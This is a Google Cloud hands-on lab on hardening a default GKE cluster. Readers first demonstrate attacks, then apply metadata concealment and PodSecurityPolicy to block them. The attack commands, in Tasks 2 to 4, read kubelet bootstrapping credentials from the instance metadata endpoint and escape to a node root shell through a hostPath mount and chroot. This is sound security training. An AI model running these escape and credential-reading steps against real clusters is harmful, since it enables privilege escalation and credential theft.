arrow_back

Hardening Default GKE Cluster Configurations

Join Sign in

Hardening Default GKE Cluster Configurations

1 hour 30 minutes 7 Credits

GSP496

Google Cloud self-paced labs logo

Overview

This lab demonstrates some of the security concerns of a default GKE cluster configuration and the corresponding hardening measures to prevent multiple paths of pod escape and cluster privilege escalation. These attack paths are relevant in the following scenarios:

  1. An application flaw in an external facing pod that allows for Server-Side Request Forgery (SSRF) attacks.
  2. A fully compromised container inside a pod allowing for Remote Command Execution (RCE).
  3. A malicious internal user or an attacker with a set of compromised internal user credentials with the ability to create/update a pod in a given namespace.

This lab was created by GKE Helmsman engineers to help you grasp a better understanding of hardening default GKE cluster configurations.

The example code for this lab is provided as-is without warranty or guarantee

Objectives

Upon completion of this lab you will understand the need for protecting the GKE Instance Metadata and defining appropriate PodSecurityPolicy policies for your environment.

You will:

  1. Create a small GKE cluster using the default settings.

  2. Validate the most common paths of pod escape and cluster privilege escalation from the perspective of a malicious internal user.

  3. Harden the GKE cluster for these issues.

  4. Validate the cluster so that those actions are no longer allowed.

Setup and requirements

Before you click the Start Lab button

Read these instructions. Labs are timed and you cannot pause them. The timer, which starts when you click Start Lab, shows how long Google Cloud resources will be made available to you.

This hands-on lab lets you do the lab activities yourself in a real cloud environment, not in a simulation or demo environment. It does so by giving you new, temporary credentials that you use to sign in and access Google Cloud for the duration of the lab.

To complete this lab, you need:

  • Access to a standard internet browser (Chrome browser recommended).
Note: Use an Incognito or private browser window to run this lab. This prevents any conflicts between your personal account and the Student account, which may cause extra charges incurred to your personal account.
  • Time to complete the lab---remember, once you start, you cannot pause a lab.
Note: If you already have your own personal Google Cloud account or project, do not use it for this lab to avoid extra charges to your account.

How to start your lab and sign in to the Google Cloud Console

  1. Click the Start Lab button. If you need to pay for the lab, a pop-up opens for you to select your payment method. On the left is the Lab Details panel with the following:

    • The Open Google Console button
    • Time remaining
    • The temporary credentials that you must use for this lab
    • Other information, if needed, to step through this lab
  2. Click Open Google Console. The lab spins up resources, and then opens another tab that shows the Sign in page.

    Tip: Arrange the tabs in separate windows, side-by-side.

    Note: If you see the Choose an account dialog, click Use Another Account.
  3. If necessary, copy the Username from the Lab Details panel and paste it into the Sign in dialog. Click Next.

  4. Copy the Password from the Lab Details panel and paste it into the Welcome dialog. Click Next.

    Important: You must use the credentials from the left panel. Do not use your Google Cloud Skills Boost credentials. Note: Using your own Google Cloud account for this lab may incur extra charges.
  5. Click through the subsequent pages:

    • Accept the terms and conditions.
    • Do not add recovery options or two-factor authentication (because this is a temporary account).
    • Do not sign up for free trials.

After a few moments, the Cloud Console opens in this tab.

Note: You can view the menu with a list of Google Cloud Products and Services by clicking the Navigation menu at the top-left. Navigation menu icon

Activate Cloud Shell

Cloud Shell is a virtual machine that is loaded with development tools. It offers a persistent 5GB home directory and runs on the Google Cloud. Cloud Shell provides command-line access to your Google Cloud resources.

  1. Click Activate Cloud Shell Activate Cloud Shell icon at the top of the Google Cloud console.

When you are connected, you are already authenticated, and the project is set to your PROJECT_ID. The output contains a line that declares the PROJECT_ID for this session:

Your Cloud Platform project in this session is set to YOUR_PROJECT_ID

gcloud is the command-line tool for Google Cloud. It comes pre-installed on Cloud Shell and supports tab-completion.

  1. (Optional) You can list the active account name with this command:

gcloud auth list
  1. Click Authorize.

  2. Your output should now look like this:

Output:

ACTIVE: * ACCOUNT: student-01-xxxxxxxxxxxx@qwiklabs.net To set the active account, run: $ gcloud config set account `ACCOUNT`
  1. (Optional) You can list the project ID with this command:

gcloud config list project

Output:

[core] project = <project_ID>

Example output:

[core] project = qwiklabs-gcp-44776a13dea667a6 Note: For full documentation of gcloud, in Google Cloud, refer to the gcloud CLI overview guide.

Task 1. Create a simple GKE cluster

  1. Set a zone into an environment variable called MY_ZONE. This lab is using us-central1-a, you can select a zone if you prefer:

export MY_ZONE=us-central1-a
  1. Run this to start a Kubernetes cluster managed by Kubernetes Engine named simplecluster and configure it to run 2 nodes:

gcloud container clusters create simplecluster --zone $MY_ZONE --num-nodes 2 --metadata=disable-legacy-endpoints=false

It takes several minutes to create a cluster as Kubernetes Engine provisions virtual machines for you. The warnings about features available in new versions can be safely ignored for this lab.

  1. After the cluster is created, check your installed version of Kubernetes using the kubectl version command:

kubectl version

The gcloud container clusters create command automatically authenticated kubectl for you.

  1. View your running nodes in the Cloud Console. On the Navigation menu, click Compute Engine > VM Instances.

Your Kubernetes cluster is now ready for use.

Click Check my progress to verify the objective. Create a simple GKE cluster

Task 2. Run a Google Cloud-SDK pod

  1. From your Cloud Shell prompt, launch a single instance of the Google Cloud-SDK container:

kubectl run -it --rm gcloud --image=google/cloud-sdk:latest --restart=Never -- bash

This will take a few minutes to complete.

Note: If you get a timed out error, run the command again.
  1. You should now have a bash shell inside the pod's container:
root@gcloud:/#

It may take a few seconds for the container to be started and the command prompt to be displayed. If you don't see a command prompt, try pressing Enter.

Explore the Compute Metadata endpoint

  1. Run the following command to access the v1 Compute Metadata endpoint:

curl -s http://metadata.google.internal/computeMetadata/v1/instance/name

Output looks like:

...snip... Your client does not have permission to get URL /computeMetadata/v1/instance/name from this server. Missing Metadata-Flavor:Google header. ...snip...

Notice how it returns an error stating that it requires the custom HTTP header to be present.

  1. Add the custom header on the next run and retrieve the Compute Engine instance name that is running this pod:

curl -s -H "Metadata-Flavor: Google" http://metadata.google.internal/computeMetadata/v1/instance/name

Output looks like:

gke-simplecluster-default-pool-b57a043a-6z5v Note: If a custom HTTP header is not required to access a Compute Engine Instance Metadata endpoint, an attacker would need only an application flaw to trick a web URL to provide user credentials. By requiring a custom HTTP header, an attack is more difficult as the attacker would need both an application flaw and the custom header to be successful.

Keep this shell inside the pod available for the next step.

  1. If you accidentally exit from the pod, simply re-run:

kubectl run -it --rm gcloud --image=google/cloud-sdk:latest --restart=Never -- bash

Explore the GKE node bootstrapping credentials

  1. From inside the same pod shell, run the following command to list the attributes associated with the underlying Compute Engine instances. Be sure to include the trailing slash:

curl -s -H "Metadata-Flavor: Google" http://metadata.google.internal/computeMetadata/v1/instance/attributes/

Perhaps the most sensitive data in this listing is kube-env. It contains several variables which the kubelet uses as initial credentials when attaching the node to the GKE cluster. The variables CA_CERT, KUBELET_CERT, and KUBELET_KEY contain this information and are therefore considered sensitive to non-cluster administrators.

  1. To see the potentially sensitive variables and data, run the following command:

curl -s -H "Metadata-Flavor: Google" http://metadata.google.internal/computeMetadata/v1/instance/attributes/kube-env

Therefore, in any of the following situations:

  • A flaw that allows for SSRF in a pod application
  • An application or library flaw that allow for RCE in a pod
  • An internal user with the ability to create or exec into a pod

There exists a high likelihood for compromise and exfiltration of sensitive kubelet bootstrapping credentials via the Compute Metadata endpoint. With the kubelet credentials, it is possible to leverage them in certain circumstances to escalate privileges to that of cluster-admin and therefore have full control of the GKE Cluster including all data, applications, and access to the underlying nodes.

Leverage the Permissions assigned to this Node Pool's service account

By default, Google Cloud projects with the Compute API enabled have a default service account in the format of NNNNNNNNNN-compute@developer.gserviceaccount.com in the project and the Editor role attached to it. Also by default, GKE clusters created without specifying a service account will utilize the default Compute service account and attach it to all worker nodes.

  1. Run the following curl command to list the OAuth scopes associated with the service account attached to the underlying Compute Engine instance:

curl -s -H "Metadata-Flavor: Google" http://metadata.google.internal/computeMetadata/v1/instance/service-accounts/default/scopes

(output)

https://www.googleapis.com/auth/devstorage.read_only https://www.googleapis.com/auth/logging.write https://www.googleapis.com/auth/monitoring https://www.googleapis.com/auth/service.management.readonly https://www.googleapis.com/auth/servicecontrol https://www.googleapis.com/auth/trace.append

The combination of authentication scopes and the permissions of the service account dictates what applications on this node can access. The above list is the minimum scopes needed for most GKE clusters, but some use cases require increased scopes.

Warning: If, during cluster creation, you configured the authentication scope to include `https://www.googleapis.com/auth/cloud-platform`, any Google Cloud API would be in scope and only IAM permissions assigned to the service account would determine access.

Further, if the default service account with the default IAM Role of Editor is in use, any pod on this node pool has Editor permissions to the Google Cloud project where the GKE cluster is deployed. As the Editor IAM Role has a wide range of read/write permissions to interact with project resources such as Compute instances, Cloud Storage buckets, GCR registries, and more, this is a significant security risk.
  1. Exit out of this pod by typing:

exit Note: If did not return to cloud shell press ctrl+c

Task 3. Deploy a pod that mounts the host filesystem

One of the simplest paths for "escaping" to the underlying host is by mounting the host's filesystem into the pod's filesystem using standard Kubernetes volumes and volumeMounts in a Pod specification.

  1. To demonstrate this, run the following to create a Pod that mounts the underlying host filesystem / at the folder named /rootfs inside the container:

cat <<EOF | kubectl apply -f - apiVersion: v1 kind: Pod metadata: name: hostpath spec: containers: - name: hostpath image: google/cloud-sdk:latest command: ["/bin/bash"] args: ["-c", "tail -f /dev/null"] volumeMounts: - mountPath: /rootfs name: rootfs volumes: - name: rootfs hostPath: path: / EOF
  1. Delete the gcloud pod:

kubectl delete pod gcloud
  1. Run kubectl get pod and re-run until it's in the "Running" state:

kubectl get pod

(Output)

NAME READY STATUS RESTARTS AGE hostpath 1/1 Running 0 30s

Click Check my progress to verify the objective. Deploy a pod that mounts the host filesystem

Task 4. Explore and compromise the underlying host

  1. Run the following to obtain a shell inside the pod you just created:

kubectl exec -it hostpath -- bash
  1. Switch to the pod shell's root filesystem point to that of the underlying host:

chroot /rootfs /bin/bash

With those simple commands, the pod is now effectively a root shell on the node. You are now able to do the following:

run the standard docker command with full permissions

docker ps

list docker images

docker images

docker run a privileged container of your choosing

docker run --privileged <imagename>:<imageversion>

examine the Kubernetes secrets mounted

mount | grep volumes | awk '{print $3}' | xargs ls

exec into any running container (even into another pod in another namespace)

docker exec -it <docker container ID> sh

Nearly every operation that the root user can perform is available to this pod shell. This includes persistence mechanisms like adding SSH users/keys, running privileged docker containers on the host outside the view of Kubernetes, and much more.

  1. To exit the pod shell, run exit twice - once to leave the chroot and another to leave the pod's shell:

exit exit Note: If did not return to cloud shell press ctrl+c
  1. Now you can delete the hostpath pod:

kubectl delete pod hostpath

Understand the available controls

The next steps of this demo will cover:

  • Disabling the Legacy Compute Engine Metadata API Endpoint - By specifying a custom metadata key and value, the v1beta1 metadata endpoint will no longer be available from the instance.

  • Enable Metadata Concealment - Passing an additional configuration during cluster and/or node pool creation, a lightweight proxy will be installed on each node that proxies all requests to the Metadata API and prevents access to sensitive endpoints.

  • Enable and configure PodSecurityPolicy - Configuring this option on a GKE cluster will add the PodSecurityPolicy Admission Controller which can be used to restrict the use of insecure settings during Pod creation. In this demo's case, preventing containers from running as the root user and having the ability to mount the underlying host filesystem.

Task 5. Deploy a second node pool

To enable you to experiment with and without the Metadata endpoint protections in place, you'll create a second node pool that includes two additional settings. Pods that are scheduled to the generic node pool will not have the protections, and Pods scheduled to the second node pool will have them enabled.

Note: Legacy endpoints were deprecated on September 30, 2020. In GKE versions 1.12 and newer, the `--metadata=disable-legacy-endpoints=true` setting is automatically enabled. The next command below explicitly defines it for clarity.
  • Create the second node pool:

gcloud beta container node-pools create second-pool --cluster=simplecluster --zone=$MY_ZONE --num-nodes=1 --metadata=disable-legacy-endpoints=true --workload-metadata-from-node=SECURE

Click Check my progress to verify the objective. Deploy a second node pool

Task 6. Run a Google Cloud-SDK pod

  1. In Cloud Shell, launch a single instance of the Google Cloud-SDK container that will be run only on the second node pool with the protections enabled and not run as the root user:

kubectl run -it --rm gcloud --image=google/cloud-sdk:latest --restart=Never --overrides='{ "apiVersion": "v1", "spec": { "securityContext": { "runAsUser": 65534, "fsGroup": 65534 }, "nodeSelector": { "cloud.google.com/gke-nodepool": "second-pool" } } }' -- bash Note: If you get a timed out error, run the command again.
  1. You should now have a bash shell inside the pod's container running on the node pool named second-pool. You should see the following:
nobody@gcloud:/$

It may take a few seconds for the container to start and the command prompt to open.

If you don't see a command prompt, press Enter.

Explore various blocked endpoints

  1. With the configuration of the second node pool set to --workload-metadata-from-node=SECURE , the following command to retrieve the sensitive file, kube-env, will now fail:

curl -s -H "Metadata-Flavor: Google" http://metadata.google.internal/computeMetadata/v1/instance/attributes/kube-env

(Output)

This metadata endpoint is concealed.
  1. But other commands to non-sensitive endpoints will still succeed if the proper HTTP header is passed:

curl -s -H "Metadata-Flavor: Google" http://metadata.google.internal/computeMetadata/v1/instance/name

(Example Output)

gke-simplecluster-second-pool-8fbd68c5-gzzp
  1. Exit out of the pod:

exit

You should now be back in Cloud Shell.

Task 7. Deploy PodSecurityPolicy objects

  1. In order to have the necessary permissions to proceed, grant explicit permissions to your own user account to become cluster-admin:

kubectl create clusterrolebinding clusteradmin --clusterrole=cluster-admin --user="$(gcloud config list account --format 'value(core.account)')"

(Output)

clusterrolebinding.rbac.authorization.k8s.io/clusteradmin created
  1. Next, deploy a more restrictive PodSecurityPolicy on all authenticated users in the default namespace:

cat <<EOF | kubectl apply -f - --- apiVersion: policy/v1beta1 kind: PodSecurityPolicy metadata: name: restrictive-psp annotations: seccomp.security.alpha.kubernetes.io/allowedProfileNames: 'docker/default' apparmor.security.beta.kubernetes.io/allowedProfileNames: 'runtime/default' seccomp.security.alpha.kubernetes.io/defaultProfileName: 'docker/default' apparmor.security.beta.kubernetes.io/defaultProfileName: 'runtime/default' spec: privileged: false # Required to prevent escalations to root. allowPrivilegeEscalation: false # This is redundant with non-root + disallow privilege escalation, # but we can provide it for defense in depth. requiredDropCapabilities: - ALL # Allow core volume types. volumes: - 'configMap' - 'emptyDir' - 'projected' - 'secret' - 'downwardAPI' # Assume that persistentVolumes set up by the cluster admin are safe to use. - 'persistentVolumeClaim' hostNetwork: false hostIPC: false hostPID: false runAsUser: # Require the container to run without root privileges. rule: 'MustRunAsNonRoot' seLinux: # This policy assumes the nodes are using AppArmor rather than SELinux. rule: 'RunAsAny' supplementalGroups: rule: 'MustRunAs' ranges: # Forbid adding the root group. - min: 1 max: 65535 fsGroup: rule: 'MustRunAs' ranges: # Forbid adding the root group. - min: 1 max: 65535 EOF

(Output)

podsecuritypolicy.extensions/restrictive-psp created
  1. Next, add the ClusterRole that provides the necessary ability to "use" this PodSecurityPolicy:

cat <<EOF | kubectl apply -f - --- kind: ClusterRole apiVersion: rbac.authorization.k8s.io/v1 metadata: name: restrictive-psp rules: - apiGroups: - extensions resources: - podsecuritypolicies resourceNames: - restrictive-psp verbs: - use EOF

(Output)

clusterrole.rbac.authorization.k8s.io/restrictive-psp created
  1. Finally, create a RoleBinding in the default namespace that allows any authenticated user permission to leverage the PodSecurityPolicy:

cat <<EOF | kubectl apply -f - --- # All service accounts in kube-system # can 'use' the 'permissive-psp' PSP apiVersion: rbac.authorization.k8s.io/v1 kind: RoleBinding metadata: name: restrictive-psp namespace: default roleRef: apiGroup: rbac.authorization.k8s.io kind: ClusterRole name: restrictive-psp subjects: - apiGroup: rbac.authorization.k8s.io kind: Group name: system:authenticated EOF

(Output)

rolebinding.rbac.authorization.k8s.io/restrictive-psp created Note: In a real environment, consider replacing the system:authenticated user in the RoleBinding with the specific user or service accounts that you want to have the ability to create pods in the default namespace.

Click Check my progress to verify the objective. Deploy PodSecurityPolicy objects

Enable PodSecurity policy

  • Enable the PodSecurityPolicy Admission Controller:

gcloud beta container clusters update simplecluster --zone $MY_ZONE --enable-pod-security-policy

This takes a few minutes to complete.

Task 8. Deploy a blocked pod that mounts the host filesystem

Because the account used to deploy the GKE cluster was granted cluster-admin permissions in a previous step, it's necessary to create another separate "user" account to interact with the cluster and validate the PodSecurityPolicy enforcement.

  1. To do this, run:

gcloud iam service-accounts create demo-developer

(Output)

Created service account [demo-developer].
  1. Next, run these commands to grant these permissions to the service account - the ability to interact with the cluster and attempt to create pods:

MYPROJECT=$(gcloud config list --format 'value(core.project)') gcloud projects add-iam-policy-binding "${MYPROJECT}" --role=roles/container.developer --member="serviceAccount:demo-developer@${MYPROJECT}.iam.gserviceaccount.com"
  1. Obtain the service account credentials file by running:

gcloud iam service-accounts keys create key.json --iam-account "demo-developer@${MYPROJECT}.iam.gserviceaccount.com"
  1. Configure kubectl to authenticate as this service account:

gcloud auth activate-service-account --key-file=key.json
  1. To configure kubectl to use these credentials when communicating with the cluster, run:

gcloud container clusters get-credentials simplecluster --zone $MY_ZONE
  1. Now, try to create another pod that mounts the underlying host filesystem / at the folder named /rootfs inside the container:

cat <<EOF | kubectl apply -f - apiVersion: v1 kind: Pod metadata: name: hostpath spec: containers: - name: hostpath image: google/cloud-sdk:latest command: ["/bin/bash"] args: ["-c", "tail -f /dev/null"] volumeMounts: - mountPath: /rootfs name: rootfs volumes: - name: rootfs hostPath: path: / EOF
  1. This output validatates that it's blocked by PSP:
Error from server (Forbidden): error when creating "STDIN": pods "hostpath" is forbidden: unable to validate against any pod security policy: [spec.volumes[0]: Invalid value: "hostPath": hostPath volumes are not allowed to be used]
  1. Deploy another pod that meets the criteria of the restrictive-psp:

cat <<EOF | kubectl apply -f - apiVersion: v1 kind: Pod metadata: name: hostpath spec: securityContext: runAsUser: 1000 fsGroup: 2000 containers: - name: hostpath image: google/cloud-sdk:latest command: ["/bin/bash"] args: ["-c", "tail -f /dev/null"] EOF

(Output)

pod/hostpath created
  1. To view the annotation that gets added to the pod indicating which PodSecurityPolicy authorized the creation, run:

kubectl get pod hostpath -o=jsonpath="{ .metadata.annotations.kubernetes\.io/psp }"

(Output appended to the Cloud Shell command line)

restrictive-psp

Click Check my progress to verify the objective. Deploy a blocked pod that mounts the host filesystem

Congratulations!

In this lab you configured a default Kubernetes cluster in Google Kubernetes Engine. You then probed and exploited the access available to your pod, hardened the cluster, and validated those malicious actions were no longer possible.

Finish your quest

This self-paced lab is part of the Google Kubernetes Engine Best Practices: Security quest. A quest is a series of related labs that form a learning path. Completing this quest earns you a badge to recognize your achievement. You can make your badge or badges public and link to them in your online resume or social media account. Enroll in this quest or any quest that contains this lab and get immediate completion credit. See the Google Cloud Skills Boost catalog to see all available quests.

Take your next lab

Continue your Quest with Google Kubernetes Engine Security: Binary Authorization, or check out these Google Cloud Skills Boost labs:

Next steps / Learn more

IMPORTANT: While this lab covers several security issues in detail, there are other areas that should be considered in your environment. Refer to Harden your cluster's security Guide for additional information.

PodSecurityPolicy: Using PodSecurityPolicies Guide and Harden your cluster's security Guide

Node Service Accounts: Permissions Guide

Protecting Node Metadata: Protect node metadata Guide

Google Cloud training and certification

...helps you make the most of Google Cloud technologies. Our classes include technical skills and best practices to help you get up to speed quickly and continue your learning journey. We offer fundamental to advanced level training, with on-demand, live, and virtual options to suit your busy schedule. Certifications help you validate and prove your skill and expertise in Google Cloud technologies.

Manual Last Updated June 29, 2022

Lab Last Tested October 23, 2021

Copyright 2022 Google LLC All rights reserved. Google and the Google logo are trademarks of Google LLC. All other company and product names may be trademarks of the respective companies with which they are associated.